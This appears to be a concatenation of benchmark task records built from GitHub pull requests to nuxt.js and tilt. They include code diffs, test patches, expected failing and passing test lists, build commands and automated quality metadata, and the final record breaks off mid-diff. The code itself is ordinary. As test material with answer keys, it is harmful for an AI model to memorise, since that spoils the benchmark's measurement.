Method: Builder.validateTemplate() Location: packages/builder/src/builder.js → class Builder Inputs: (none) – called on a Builder instance after template analysis. Outputs: Throws Error with message **'Missing App Dependencies'** when required app dependencies are not found; otherwise returns undefined. Description: Validates that the Nuxt application template includes all required dependencies; used during the build step to abort with a clear error if any are missing. Function: lock({ id, dir, root, options }) Location: packages/utils/src/locking.js → exported async function lock Inputs: - id (string) – unique identifier for the lock. - dir (string) – directory where the lock file will be placed. - root (string, optional) – base path for resolving the lock path. - options (object, optional) – lockfile options (e.g., stale, retries, onCompromised callback). Outputs: - false if the lock could not be acquired (properlock.lock returns falsy). - function release when the lock is obtained; calling the function releases the lock, removes the lock file, and logs/debugs any errors (including handling compromised‑lock scenarios). Description: Acquires a process‑wide lock using proper-lockfile, handling existing locks, errors during the check, and compromised locks; returns a release callback or false to allow the caller to continue without a lock.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 4, "num_modified_lines": 50, "pr_author": "aldarund", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only mentions fixing scripts in the with‑element‑ui example, but the provided test patch expects changes to the builder error message and extensive behavior adjustments in the locking utility. The tests therefore verify requirements that are not stated in the issue, making the specification ambiguous. This signals an environment‑preparation problem rather than a clearly defined task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect builder.validateTemplate to throw 'Missing App Dependencies' instead of the documented 'Missing Template Dependencies'.", "Tests add numerous new expectations for the locking utility (return values, warning logs, error handling) that are not mentioned in the issue." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3cdce79d133da0ff0dd8c243e478fe89d5aa771b
2019-04-05 11:20:32
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=h1) Report > Merging [#5470](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3cdce79d133da0ff0dd8c243e478fe89d5aa771b?src=pr&el=desc) will **increase** coverage by `<.01%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5470 +/- ## ========================================== + Coverage 96.13% 96.13% +<.01% ========================================== Files 74 74 Lines 2559 2562 +3 Branches 651 652 +1 ========================================== + Hits 2460 2463 +3 Misses 83 83 Partials 16 16 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/server/src/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9zZXJ2ZXIuanM=) | `97.72% <ø> (ø)` | :arrow_up: | | [packages/config/src/options.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29uZmlnL3NyYy9vcHRpb25zLmpz) | `100% <100%> (ø)` | :arrow_up: | | [packages/server/src/listener.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9saXN0ZW5lci5qcw==) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=footer). Last update [3cdce79...e368719](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=h1) Report > Merging [#5470](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3cdce79d133da0ff0dd8c243e478fe89d5aa771b?src=pr&el=desc) will **increase** coverage by `<.01%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5470 +/- ## ========================================== + Coverage 96.13% 96.13% +<.01% ========================================== Files 74 74 Lines 2559 2562 +3 Branches 651 652 +1 ========================================== + Hits 2460 2463 +3 Misses 83 83 Partials 16 16 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/server/src/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9zZXJ2ZXIuanM=) | `97.72% <ø> (ø)` | :arrow_up: | | [packages/config/src/options.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29uZmlnL3NyYy9vcHRpb25zLmpz) | `100% <100%> (ø)` | :arrow_up: | | [packages/server/src/listener.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5470/diff?src=pr&el=tree#diff-cGFja2FnZXMvc2VydmVyL3NyYy9saXN0ZW5lci5qcw==) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=footer). Last update [3cdce79...e368719](https://codecov.io/gh/nuxt/nuxt.js/pull/5470?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). clarkdo: Is this a minor breaking change for users are using url without trailing slash ?
nuxt__nuxt.js-5470
diff --git a/packages/config/src/options.js b/packages/config/src/options.js index fb8d5dd85..f985b4c94 100644 --- a/packages/config/src/options.js +++ b/packages/config/src/options.js @@ -22,6 +22,7 @@ export function getNuxtConfig(_options) { if (options.loading === true) { delete options.loading } + if ( options.router && options.router.middleware && @@ -29,15 +30,19 @@ export function getNuxtConfig(_options) { ) { options.router.middleware = [options.router.middleware] } + if (options.router && typeof options.router.base === 'string') { options._routerBaseSpecified = true } + if (typeof options.transition === 'string') { options.transition = { name: options.transition } } + if (typeof options.layoutTransition === 'string') { options.layoutTransition = { name: options.layoutTransition } } + if (typeof options.extensions === 'string') { options.extensions = [options.extensions] } @@ -69,6 +74,11 @@ export function getNuxtConfig(_options) { defaultsDeep(options, nuxtConfig) + // Sanitize router.base + if (!/\/$/.test(options.router.base)) { + options.router.base += '/' + } + // Check srcDir and generate.dir existence const hasSrcDir = isNonEmptyString(options.srcDir) const hasGenerateDir = isNonEmptyString(options.generate.dir) @@ -221,7 +231,7 @@ export function getNuxtConfig(_options) { }) } - // vue config + // Vue config const vueConfig = options.vue.config if (vueConfig.silent === undefined) { diff --git a/packages/server/src/listener.js b/packages/server/src/listener.js index 04f13a442..dfbb0e549 100644 --- a/packages/server/src/listener.js +++ b/packages/server/src/listener.js @@ -6,7 +6,7 @@ import consola from 'consola' import pify from 'pify' export default class Listener { - constructor({ port, host, socket, https, app, dev }) { + constructor({ port, host, socket, https, app, dev, baseURL }) { // Options this.port = port this.host = host @@ -14,6 +14,7 @@ export default class Listener { this.https = https this.app = app this.dev = dev + this.baseURL = baseURL // After listen this.listening = false @@ -46,7 +47,7 @@ export default class Listener { case '0.0.0.0': this.host = ip.address(); break } this.port = address.port - this.url = `http${this.https ? 's' : ''}://${this.host}:${this.port}` + this.url = `http${this.https ? 's' : ''}://${this.host}:${this.port}${this.baseURL}` return } this.url = `unix+http://${address}` diff --git a/packages/server/src/server.js b/packages/server/src/server.js index e937f00fb..483aa091f 100644 --- a/packages/server/src/server.js +++ b/packages/server/src/server.js @@ -239,7 +239,8 @@ export default class Server { socket: socket || this.options.server.socket, https: this.options.server.https, app: this.app, - dev: this.options.dev + dev: this.options.dev, + baseURL: this.options.router.base }) // Listen
fix: improve `router.base` handling <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description This PR addresses some problems with `router.base` handling and is complementary to nuxt/loading-screen#8. - Always sanitize router base to end with `/`. Previously we were just mentioning it in the docs. - Append router base to the listener computed URL. fixes issue with `-o` and CLI banner. ![image](https://user-images.githubusercontent.com/5158436/55624220-8184ac00-57ba-11e9-96d0-d79a443aed5c.png) ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [ ] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Normalize `router.base` and include it in server listening URLs **Problem** When a custom router base is provided without a trailing slash, URLs generated by Nuxt (e.g., CLI banner, `-o` flag) are malformed. The server also reports its listening address without the configured base path. **Root Cause** The router base is stored verbatim and the listener builds its URL string without consulting the router configuration. **Fix / Expected Behavior** - Ensure the router base always ends with a trailing “/”. - Propagate the normalized base to the server listener so the reported URL contains the base path. - Record whether a router base was explicitly set for internal use. - Preserve existing functionality for cases where the base already includes a slash. - CLI output and related tooling now display correct, fully‑qualified URLs. **Risk & Validation** - Verify that adding a trailing slash does not introduce double‑slashes in route resolution. - Confirm that the listener URL is correct for both standard host/port and Unix socket configurations. - Run the full test suite and manually check the CLI banner and `-o` flag for accurate URLs.
5,470
nuxt/nuxt.js
diff --git a/packages/config/test/options.test.js b/packages/config/test/options.test.js index e744db32e..87b458d81 100644 --- a/packages/config/test/options.test.js +++ b/packages/config/test/options.test.js @@ -227,3 +227,10 @@ describe('config: options', () => { }) }) }) + +describe('config: router', () => { + test('should sanitize router.base', () => { + const config = getNuxtConfig({ router: { base: '/foo' } }) + expect(config.router.base).toBe('/foo/') + }) +}) diff --git a/packages/server/test/listener.test.js b/packages/server/test/listener.test.js index e53624fd6..f37842157 100644 --- a/packages/server/test/listener.test.js +++ b/packages/server/test/listener.test.js @@ -228,7 +228,8 @@ describe('server: listener', () => { test('should compute http url', () => { const options = { port: 3000, - host: 'localhost' + host: 'localhost', + baseURL: '/' } const listener = new Listener(options) listener.server = mockServer() @@ -240,7 +241,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3000) - expect(listener.url).toEqual('http://localhost:3000') + expect(listener.url).toEqual('http://localhost:3000/') listener.server.address.mockReturnValueOnce({ address: '127.0.0.1', @@ -249,7 +250,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3001) - expect(listener.url).toEqual('http://localhost:3001') + expect(listener.url).toEqual('http://localhost:3001/') ip.address.mockReturnValueOnce('192.168.0.1') listener.server.address.mockReturnValueOnce({ @@ -259,14 +260,15 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('192.168.0.1') expect(listener.port).toEqual(3002) - expect(listener.url).toEqual('http://192.168.0.1:3002') + expect(listener.url).toEqual('http://192.168.0.1:3002/') }) test('should compute https url', () => { const options = { port: 3000, host: 'localhost', - https: true + https: true, + baseURL: '/' } const listener = new Listener(options) listener.server = mockServer() @@ -278,7 +280,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3000) - expect(listener.url).toEqual('https://localhost:3000') + expect(listener.url).toEqual('https://localhost:3000/') listener.server.address.mockReturnValueOnce({ address: '127.0.0.1', @@ -287,7 +289,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('localhost') expect(listener.port).toEqual(3001) - expect(listener.url).toEqual('https://localhost:3001') + expect(listener.url).toEqual('https://localhost:3001/') ip.address.mockReturnValueOnce('192.168.0.1') listener.server.address.mockReturnValueOnce({ @@ -297,7 +299,7 @@ describe('server: listener', () => { listener.computeURL() expect(listener.host).toEqual('192.168.0.1') expect(listener.port).toEqual(3002) - expect(listener.url).toEqual('https://192.168.0.1:3002') + expect(listener.url).toEqual('https://192.168.0.1:3002/') }) test('should compute unix socket url', () => { diff --git a/packages/server/test/server.test.js b/packages/server/test/server.test.js index 55e46e457..ae0727c4b 100644 --- a/packages/server/test/server.test.js +++ b/packages/server/test/server.test.js @@ -43,6 +43,9 @@ describe('server: server', () => { build: { publicPath: '__nuxt_test' }, + router: { + base: '/foo/' + }, render: { id: 'test-render', dist: { @@ -485,7 +488,8 @@ describe('server: server', () => { socket: '/var/nuxt/unix.socket', https: undefined, app: server.app, - dev: server.options.dev + dev: server.options.dev, + baseURL: '/foo/' }) expect(listener.listen).toBeCalledTimes(1) expect(server.listeners).toEqual([ listener ]) @@ -508,7 +512,8 @@ describe('server: server', () => { expect(Listener).toBeCalledWith({ ...nuxt.options.server, app: server.app, - dev: server.options.dev + dev: server.options.dev, + baseURL: '/foo/' }) })
[ "should compute http url", "should compute https url" ]
[ "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export getDefaultNuxtConfig and getNuxtConfig", "should construct context", "should get context with req and res", "should get correct globals", "should export Module, Nuxt and Resolver", "should export Server and Listener", "should export Builder", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should export Generator", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return builder plugins context", "should return builder build options", "detectTypeScript detects and registers runtime", "detectTypeScript skips rootDir without tsconfig.json", "should export all methods from utils folder", "should return globals with given globalName", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "lock uses setLockOptions to set defaults", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should return default nuxt configurations", "should return nuxt configurations with custom env", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening" ]
Method: Listener.constructor({port: number, host: string, socket?: string, https?: boolean, app: any, dev: boolean, baseURL?: string}) Location: packages/server/src/listener.js Inputs: - **port** – HTTP port number the server will listen on. - **host** – Hostname or IP address; `'0.0.0.0'` is resolved to the local IP. - **socket** – Optional Unix socket path. - **https** – When true the listener will use the `https` scheme. - **app** – The underlying HTTP/HTTPS application instance (e.g., Express). - **dev** – Flag indicating development mode. - **baseURL** – Optional router base (e.g., `'/foo/'`). If provided it is appended to the computed listener URL; it should end with a trailing `/`. Outputs: - Returns a new `Listener` instance with the supplied options stored as instance properties (`port`, `host`, `socket`, `https`, `app`, `dev`, `baseURL`). After the server starts, `computeURL()` will produce a URL that includes the `baseURL` suffix (e.g., `http://localhost:3000/`). Description: Constructs a server listener object, now extended to accept a `baseURL` parameter so that the generated listener URL correctly reflects the Nuxt router base. Use this when configuring a Nuxt server with a custom router base to ensure URLs (including those shown in CLI banners) are properly formed.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 3, "num_modified_lines": 16, "pr_author": "pi0", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests sanitizing `router.base` to always end with a slash and appending this base to URLs computed by the server listener. The added tests directly verify that the config normalizes the base and that Listener URLs include the trailing slash, matching the stated requirements. No test assertions rely on undocumented names, external resources, or unrelated code, and the specification is clear and complete. Therefore the task is well‑defined and aligns with the tests, qualifying as a solvable (A) task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8cddf4d852ce2bd027d3d577796be179a3f24380
2023-10-10 16:27:45
tilt-dev__tilt-6246
diff --git a/internal/controllers/fake/fixture.go b/internal/controllers/fake/fixture.go index 60498d4ea..7e84026e4 100644 --- a/internal/controllers/fake/fixture.go +++ b/internal/controllers/fake/fixture.go @@ -5,6 +5,7 @@ import ( "io" "os" "strings" + "sync" "testing" "github.com/stretchr/testify/assert" @@ -17,8 +18,10 @@ import ( "sigs.k8s.io/controller-runtime/pkg/cache" ctrlclient "sigs.k8s.io/controller-runtime/pkg/client" "sigs.k8s.io/controller-runtime/pkg/reconcile" + "sigs.k8s.io/controller-runtime/pkg/source" "github.com/tilt-dev/tilt-apiserver/pkg/server/builder/resource" + "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils" "github.com/tilt-dev/tilt/internal/testutils/bufsync" @@ -44,20 +47,22 @@ type ControllerFixture struct { out *bufsync.ThreadSafeBuffer ctx context.Context cancel context.CancelFunc - controller controller + controller reconcile.Reconciler Store *testStore Scheme *runtime.Scheme Client ctrlclient.Client } type ControllerFixtureBuilder struct { - t testing.TB - ctx context.Context - cancel context.CancelFunc - out *bufsync.ThreadSafeBuffer - ma *analytics.MemoryAnalytics - Client ctrlclient.Client - Store *testStore + t testing.TB + ctx context.Context + cancel context.CancelFunc + out *bufsync.ThreadSafeBuffer + ma *analytics.MemoryAnalytics + Client ctrlclient.Client + Store *testStore + requeuer source.Source + requeuerResultChan chan indexer.RequeueForTestResult } func NewControllerFixtureBuilder(t testing.TB) *ControllerFixtureBuilder { @@ -80,15 +85,25 @@ func NewControllerFixtureBuilder(t testing.TB) *ControllerFixtureBuilder { } } -func (b ControllerFixtureBuilder) Scheme() *runtime.Scheme { +func (b *ControllerFixtureBuilder) WithRequeuer(r source.Source) *ControllerFixtureBuilder { + b.requeuer = r + return b +} + +func (b *ControllerFixtureBuilder) WithRequeuerResultChan(ch chan indexer.RequeueForTestResult) *ControllerFixtureBuilder { + b.requeuerResultChan = ch + return b +} + +func (b *ControllerFixtureBuilder) Scheme() *runtime.Scheme { return b.Client.Scheme() } -func (b ControllerFixtureBuilder) Analytics() *analytics.MemoryAnalytics { +func (b *ControllerFixtureBuilder) Analytics() *analytics.MemoryAnalytics { return b.ma } -func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { +func (b *ControllerFixtureBuilder) Build(c controller) *ControllerFixture { b.t.Helper() // apiserver controller initialization is awkward and some parts are done via the builder, @@ -99,6 +114,16 @@ func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { _, err := c.CreateBuilder(&FakeManager{}) require.NoError(b.t, err, "Error in controller CreateBuilder()") + // In a normal controller, there's a central reconciliation loop + // that ensures we never have two reconcile() calls running simultaneously. + // + // In our test code, we want to people to invoke Reconcile() directly and in + // the background. So instead, we wrap the Reconcile() call in mutex. + lc := NewLockedController(c) + if b.requeuer != nil { + indexer.StartSourceForTesting(b.Context(), b.requeuer, lc, b.requeuerResultChan) + } + return &ControllerFixture{ t: b.t, out: b.out, @@ -107,23 +132,23 @@ func (b ControllerFixtureBuilder) Build(c controller) *ControllerFixture { Scheme: b.Client.Scheme(), Client: b.Client, Store: b.Store, - controller: c, + controller: lc, } } -func (b ControllerFixtureBuilder) OutWriter() io.Writer { +func (b *ControllerFixtureBuilder) OutWriter() io.Writer { return b.out } -func (b ControllerFixtureBuilder) Context() context.Context { +func (b *ControllerFixtureBuilder) Context() context.Context { return b.ctx } -func (b ControllerFixture) Stdout() string { +func (b *ControllerFixture) Stdout() string { return b.out.String() } -func (f ControllerFixture) T() testing.TB { +func (f *ControllerFixture) T() testing.TB { return f.t } @@ -132,7 +157,7 @@ func (f ControllerFixture) T() testing.TB { // Normally, it's not necessary to call this - the fixture will automatically cancel the context as part of test // cleanup to avoid leaking resources. However, if you want to explicitly test how a controller reacts to context // cancellation, this method can be used. -func (f ControllerFixture) Cancel() { +func (f *ControllerFixture) Cancel() { f.cancel() } @@ -269,3 +294,24 @@ type FakeManager struct { func (m *FakeManager) GetCache() cache.Cache { return nil } + +type LockedController struct { + mu sync.Mutex + controller controller +} + +func NewLockedController(c controller) *LockedController { + return &LockedController{controller: c} +} + +func (c *LockedController) Reconcile(ctx context.Context, req reconcile.Request) (ctrl.Result, error) { + c.mu.Lock() + defer c.mu.Unlock() + return c.controller.Reconcile(ctx, req) +} + +func (c *LockedController) CreateBuilder(mgr ctrl.Manager) (*builder.Builder, error) { + return c.controller.CreateBuilder(mgr) +} + +var _ controller = &LockedController{} diff --git a/pkg/webview/view.pb.go b/pkg/webview/view.pb.go index f5a6ff609..5761f919e 100644 --- a/pkg/webview/view.pb.go +++ b/pkg/webview/view.pb.go @@ -741,12 +741,12 @@ func (x *VersionSettings) GetCheckUpdates() bool { // Our websocket service has two kinds of View messages: // -// 1) On initialization, we send down the complete view state -// (TiltStartTime, UISession, UIResources, and LogList) +// 1. On initialization, we send down the complete view state +// (TiltStartTime, UISession, UIResources, and LogList) // -// 2) On every change, we send down the resources that have -// changed since the last send(). -// (new logs and any updated UISession/UIResource objects). +// 2. On every change, we send down the resources that have +// changed since the last send(). +// (new logs and any updated UISession/UIResource objects). // // All other fields are obsolete, but are needed for deserializing // old snapshots. @@ -1268,9 +1268,9 @@ func (x *UploadSnapshotResponse) GetUrl() string { // NOTE(nick): This is obsolete. // // Our websocket service has two kinds of messages: -// 1) On initialization, we send down the complete view state -// 2) On every change, we send down the resources that have -// changed since the last send(). +// 1. On initialization, we send down the complete view state +// 2. On every change, we send down the resources that have +// changed since the last send(). type AckWebsocketRequest struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache
test: use a mutex to prevent simultaneous reconcilation i think this will fix a bunch of weird race conditions and test flakiness
**Title** Prevent concurrent reconciliations in controller test fixtures **Problem** Tests that invoke controller reconciliations directly can run multiple reconcile loops at the same time, leading to race conditions and intermittent failures. This divergence from the production execution model makes test outcomes unreliable. **Root Cause** The test harness does not enforce the single‑threaded guarantee that the controller manager provides in production, allowing overlapping reconcile calls. **Fix / Expected Behavior** - Introduce a wrapper around controllers that serialises reconcile execution with a mutual‑exclusion lock. - Integrate this wrapper into the test fixture builder so all test‑instantiated controllers automatically use the serialized behavior. - Extend the builder to optionally accept a source for requeue testing and a channel for receiving requeue results. - Preserve the original controller interfaces and functionality while adding the safety layer. **Risk & Validation** - Verify that no deadlock occurs when the requeue source interacts with the locked controller. - Run the full test suite to confirm that previously flaky tests now pass consistently. - Ensure that production controller behavior remains unchanged by confirming no regressions in integration tests.
6,246
tilt-dev/tilt
diff --git a/internal/controllers/core/cluster/reconciler_test.go b/internal/controllers/core/cluster/reconciler_test.go index c29710da6..a4d30b283 100644 --- a/internal/controllers/core/cluster/reconciler_test.go +++ b/internal/controllers/core/cluster/reconciler_test.go @@ -291,9 +291,8 @@ func newFixture(t *testing.T) *fixture { base, "tilt-default") requeueChan := make(chan indexer.RequeueForTestResult, 1) - indexer.StartSourceForTesting(cfb.Context(), r.requeuer, r, requeueChan) return &fixture{ - ControllerFixture: cfb.Build(r), + ControllerFixture: cfb.WithRequeuer(r.requeuer).WithRequeuerResultChan(requeueChan).Build(r), r: r, ma: cfb.Analytics(), clock: clock, diff --git a/internal/controllers/core/cmd/controller_test.go b/internal/controllers/core/cmd/controller_test.go index 1aeafa35b..c04ec6c31 100644 --- a/internal/controllers/core/cmd/controller_test.go +++ b/internal/controllers/core/cmd/controller_test.go @@ -20,7 +20,6 @@ import ( "sigs.k8s.io/controller-runtime/pkg/reconcile" "github.com/tilt-dev/tilt/internal/controllers/fake" - "github.com/tilt-dev/tilt/internal/controllers/indexer" "github.com/tilt-dev/tilt/internal/engine/local" "github.com/tilt-dev/tilt/internal/store" "github.com/tilt-dev/tilt/internal/testutils/configmap" @@ -946,10 +945,9 @@ func newFixture(t *testing.T) *fixture { sc := local.NewServerController(f.Client) clock := clockwork.NewFakeClock() c := NewController(f.Context(), fe, fpm, f.Client, st, clock, v1alpha1.NewScheme()) - indexer.StartSourceForTesting(f.Context(), c.requeuer, c, nil) return &fixture{ - 